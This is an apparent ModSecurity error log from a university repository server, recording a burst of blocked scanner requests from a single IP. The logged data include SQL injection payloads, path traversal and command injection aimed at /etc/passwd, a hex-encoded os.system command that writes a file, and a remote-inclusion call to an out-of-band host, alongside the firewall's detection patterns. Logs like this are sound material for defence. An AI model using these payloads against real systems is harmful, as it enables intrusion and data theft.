"repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11hsCo-f0AAATlLHQAAAAq"]
[Tue Aug 29 11:35:20.340362 2023] [:error] [pid 1391] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO11iMCo-f0AAAVvlG8AAAAe"]
[Tue Aug 29 11:35:21.304171 2023] [:error] [pid 1387] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:vars[1][]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ] found within ARGS_NAMES:vars[1][]: vars[1][]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO11icCo-f0AAAVr@R0AAAAZ"]
[Tue Aug 29 11:35:22.361206 2023] [:error] [pid 1309] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:categories. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ~ found within ARGS:categories: ~31~27~20union~20all~20select~20~27hongjing~27~2c~40~40version~2d~2d"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repository.unla.ac.id"] [uri "/servlet/codesettree"] [unique_id "ZO11isCo-f0AAAUdm6IAAABS"]
[Tue Aug 29 11:35:22.361571 2023] [:error] [pid 1185] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:bwg_tag_id_bwg_thumbnails_0[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:bwg_tag_id_bwg_thumbnails_0[]: )\\x22 union select 1,2,3,4,5,6,7,concat(md5(999999999), 0x2c, 8),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11isCo-f0AAAShCcEAAAAi"]
[Tue Aug 29 11:35:24.315011 2023] [:error] [pid 1361] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://notburpcollaborator.net found within TX:1: notburpcollaborator.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/Items/RemoteSearch/Image"] [unique_id "ZO11jMCo-f0AAAVRxesAAAAQ"]
[Tue Aug 29 11:35:24.333607 2023] [:error] [pid 1391] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:apis. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:apis: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/api/console/api_server"] [unique_id "ZO11jMCo-f0AAAVvlHYAAAAe"]
[Tue Aug 29 11:35:25.313301 2023] [:error] [pid 889] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:post_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:post_id: (SELECT 3 FROM (SELECT SLEEP(7))enz)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11jcCo-f0AAAN5YIYAAAAN"]
[Tue Aug 29 11:35:25.365665 2023] [:error] [pid 1270] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'orQN'='orQN found within ARGS:username: test' AND (SELECT 4458 FROM (SELECT(SLEEP(6)))JblN) AND 'orQN'='orQN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/classes/Login.php"] [unique_id "ZO11jcCo-f0AAAT2JTYAAAAz"]
[Tue Aug 29 11:35:26.334787 2023] [:error] [pid 1247] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ',''); found within ARGS:password: g','');import os;os.system('6563686f20224d6c566b6547744f4e7a464f597a41344e6d51344e477846633278795630644c4f45315022207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574'.decode('hex'))#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/webadmin/tools/unixlogin.php"] [unique_id "ZO11jsCo-f0AAATfd58AAAAk"]
[Tue Aug 29 11:35:27.328171 2023] [:error] [pid 1307] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:id[]: 1 AND (SELECT 321 FROM (SELECT(SLEEP(6)))je)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11j8Co-f0AAAUbg3AAAABQ"]
[Tue Aug 29 11:35:27.345655 2023] [:error] [pid 1166] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:groupsIds[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )-- - found within ARGS:groupsIds[]: 1) AND (SELECT 3066 FROM (SELECT(SLEEP(5)))CEHy)-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11j8Co-f0AAASOUsQAAAAR"]
[Tue Aug 29 11:35:28.308556 2023] [:error] [pid 1384] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:username: admin' AND 4719=4719-- GZHh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/banker/index.php"] [unique_id "ZO11kMCo-f0AAAVoCBkAAAAY"]
[Tue Aug 29 11:35:29.303925 2023] [:error] [pid 1384] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:id: 1 UNION ALL SELECT NULL,NULL,md5('CVE-2021-24666'),NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11kcCo-f0AAAVoCBsAAAAY"]
[Tue Aug 29 11:35:29.341419 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:clientId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:clientId: {{id}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repository.unla.ac.id"] [uri "/asyncrenderer/{{url}}"] [unique_id "ZO11kcCo-f0AAAUKhCsAAABC"]
[Tue Aug 29 11:35:30.316854 2023] [:error] [pid 1293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:host. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:host:  cat${ifs}/etc/passwd "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/network_test.php"] [unique_id "ZO11ksCo-f0AAAUNapMAAABF"]
[Tue Aug 29 11:35:32.301038 2023] [:error] [pid 1289] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:data_target. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:data_target: vote_score = 1 AND (SELECT 3 FROM (SELECT(SLEEP(6)))gwe)-- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11lMCo-f0AAAUJI1kAAABB"]
[Tue Aug 29 11:35:32.339841 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/nette.micro/"] [unique_id "ZO11lMCo-f0AAASHiAkAAAAD"]
[Tue Aug 29 11:35:32.351827 2023] [:error] [pid 1307] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:filename: ../../../../../../home/talariuser/www/app/webroot/files/2UdxkuPYBktPaU9ruKB9Vm8sOw9"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/Collector/appliancesettings/applianceSettingsFileTransfer"] [unique_id "ZO11lMCo-f0AAAUbg3oAAABQ"]
[Tue Aug 29 11:35:33.330616 2023] [:error] [pid 1232] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id_form. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:id_form: 1 UNION ALL SELECT NULL,NULL,md5(999999999),NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11lcCo-f0AAATQXk0AAAAO"]
[Tue Aug 29 11:35:33.357624 2023] [:error] [pid 1293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:arp_template_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:arp_template_id: 1 AND (SELECT 8948 FROM (SELECT(SLEEP(6)))iIic)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11lcCo-f0AAAUNapoAAABF"]
[Tue Aug 29 11:35:34.304775 2023] [:error] [pid 1166] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/cab-fare-calculator/tblight.php"] [unique_id "ZO11lsCo-f0AAASOUtIAAAAR"]
[Tue Aug 29 11:35:34.353609 2023] [:error] [pid 1270] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:fingerprint. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:fingerprint: (SELECT SLEEP(6))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11lsCo-f0AAAT2JUcAAAAz"]
[Tue Aug 29 11:35:34.387611 2023] [:error] [pid 1384] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'sWZA'='sWZA found within ARGS:id: test' AND (SELECT 2844 FROM (SELECT(SLEEP(6)))FDTM) AND 'sWZA'='sWZA"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO11lsCo-f0AAAVoCCsAAAAY"]
[Tue Aug 29 11:35:35.344736 2023] [:error] [pid 1293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11l8Co-f0AAAUNaqAAAABF"]
[Tue Aug 29 11:35:35.396501 2023] [:error] [pid 1402] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:queriesCnt. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:queriesCnt:  cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO11l8Co-f0AAAV6LCUAAAAI"]
[Tue Aug 29 11:36:24.499476 2023] [:error] [pid 1278] [client 143.42.78.27] ModSecurity: Rule 7fe1c67ac3c8 [id "981246"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "239"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "repository.unla.ac.id"] [uri "/xmlpserver/services/XMLPService"] [unique_id "ZO11yMCo-f0AAAT@KykAAAA2"]
[Tue Aug 29 11:36:24.543065 2023] [:error] [pid 1409] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../..// found within ARGS:file_name: ../../../../../..//etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/cgi-bin/tsaupload.cgi"] [unique_id "ZO11yMCo-f0AAAWBBPcAAAAB"]
[Tue Aug 29 11:36:24.623280 2023] [:error] [pid 1307] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11yMCo-f0AAAUbg5sAAABQ"]
[Tue Aug 29 11:36:24.842343 2023] [:error] [pid 1285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:table_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ); --\\x22 found within ARGS:table_name: pg_user\\x22; select pg_sleep(6); --\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/api/v2/open/rowsInfo"] [unique_id "ZO11yMCo-f0AAAUFdhMAAAA9"]
[Tue Aug 29 11:36:26.603859 2023] [:error] [pid 1434] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11ysCo-f0AAAWa-U4AAAAI"]
[Tue Aug 29 11:36:28.430581 2023] [:error] [pid 1449] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/ccmivr/IVRGetAudioFile.do"] [unique_id "ZO11zMCo-f0AAAWpXgAAAAAW"]
